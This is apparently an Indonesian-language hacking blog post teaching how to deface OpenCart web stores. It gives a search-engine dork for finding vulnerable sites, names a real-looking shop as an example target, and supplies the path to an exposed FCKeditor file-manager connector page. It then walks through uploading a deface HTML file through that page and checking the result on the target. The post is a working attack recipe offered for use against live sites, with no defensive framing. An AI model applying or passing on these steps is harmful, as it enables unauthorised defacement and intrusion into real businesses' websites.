Deface with Powered by Open Cart

Remote File Upload Opencart (deface)


dork : Powered By OpenCart site:com

"site:" terserah, yang penting support opencart

ex target: http://www.harleypartsintl.com/

bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex: http://www.target.com/patch/

nah kalo dh dpt trget, lngsung aj kita inject exploitnya

for exploit :

    Quote:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


jdi nya gni
ex: http://www.harleypartsintl.com/admin/vie.../test.html

kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini

Code:
"file uploaded with no errors"

liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"

skrng liat hasilnya....

ex hasil: http://www.harleypartsintl.com/h-n.html

sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..
LihatTutupKomentar
loading...